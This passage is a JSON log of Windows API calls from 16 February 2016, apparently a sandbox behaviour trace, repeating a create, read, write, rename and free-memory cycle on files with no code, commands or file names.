"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,915", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,926", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,936", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,956", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,966", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,976", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,986", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,996", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,006", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,016", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,026", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,026", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,036", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,076", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,156", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": 